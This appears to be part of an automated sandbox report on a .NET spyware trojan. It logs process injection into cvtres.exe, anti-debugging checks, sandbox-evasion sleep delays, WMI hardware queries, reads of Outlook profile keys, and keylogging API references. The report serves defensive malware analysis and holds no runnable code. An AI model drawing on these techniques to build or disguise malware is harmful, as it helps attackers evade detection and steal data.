                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeBinary or memory string: OriginalFilenameXAAWWQQRDG243.exe< vs SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: invalid certificate
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeVirustotal: Detection: 24%
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeReversingLabs: Detection: 29%
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/1
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, u206c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.0.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                    Source: 0.0.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u206c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.0.cvtres.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 1.0.cvtres.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: XAAWWQQRDG243.pdb source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_005A1D52 push eax; iretd 0_2_005A1D57
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_005A0B62 push edx; ret 0_2_005A0B85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB3A6D2 push ds; ret 1_2_0AB3A6DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB3A730 push ds; ret 1_2_0AB3A732
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB3A738 push ds; ret 1_2_0AB3A73A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB39B28 push ss; ret 1_2_0AB39B2A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB39B59 push ss; ret 1_2_0AB39B5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0AB37DE0 push es; ret 1_2_0AB37DEA
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeStatic PE information: real checksum: 0x57c2e should be: 0x5f1d0
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.592349804617437
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6524Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 6528Thread sleep count: 9507 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 9507Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277296080.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %GiEQgaEQeMUQ
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %kWjFEAAAGiEQgaEQeMUQAAAaIRC
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %/gEsBhYqHwoTCwARCxj+ASwGAxRRGRMLABELHP4BLAkgACAAAAwdEwsAEQsfCv4BLCMRBA0CB3QMAAAbEQQIFm+5AQAKEwYRBhZAfAAAABYqHwsTCwARCxr+ASwOIAAgAACNLwAAAQsbEwsAEQsZ/gEsBgQUURoTCwARCx7+ASwVAiAAAACAKPQCAAYo6gAABiYfCRMLABELHf4BLAcIFjOQHhMLABELF/4BLAMYEwsAEQsW/gEsAxcTCwARCx8L/gEsAisFOCL///8RBBEG1hMECBEG2gwHdAwAABsWCRnaKLoBAAoRBBIAKM8AAAYsrQMoowAACgd0DAAAGxYGb9oAAApREQQGOxQBAAARBAbaEwcEEQcX2hfWjS8AAAFRFNCCAAABKBQAAAooVQIABhuNBwAAARMIEQgWBygRAAAKohEIFwaMUQAAAaIRCBgEUKIRCBkWjFEAAAGiEQgaEQeMUQAAAaIRCBM
                    Source: cvtres.exe, 00000001.00000002.542165976.000000000A4B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeCode function: 0_2_010DF028 CheckRemoteDebuggerPresent,0_2_010DF028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0A805860 LdrInitializeThunk,1_2_0A805860
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 436000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 438000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 513D008Jump to behavior
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, u200d????????????????????????????????????????.csReference to suspicious API methods: ('????????????????????????????????????????', 'GetProcAddress@kernel32'), ('?????????????????????????????????????????', 'LoadLibraryA@kernel32')
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 0.0.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('????????????????????????????????????????', 'GetProcAddress@kernel32'), ('?????????????????????????????????????????', 'LoadLibraryA@kernel32')
                    Source: 0.0.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('????????????????????????????????????????', 'GetProcAddress@kernel32'), ('?????????????????????????????????????????', 'LoadLibraryA@kernel32')
                    Source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.570000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
                    Source: 1.0.cvtres.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 1.0.cvtres.exe.400000.3.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 1.2.cvtres.exe.400000.0.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 1.0.cvtres.exe.400000.4.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 1.0.cvtres.exe.400000.2.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 1.0.cvtres.exe.400000.1.unpack, A/E1.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277134175.00000000029DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe, 00000000.00000002.277134175.00000000029DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
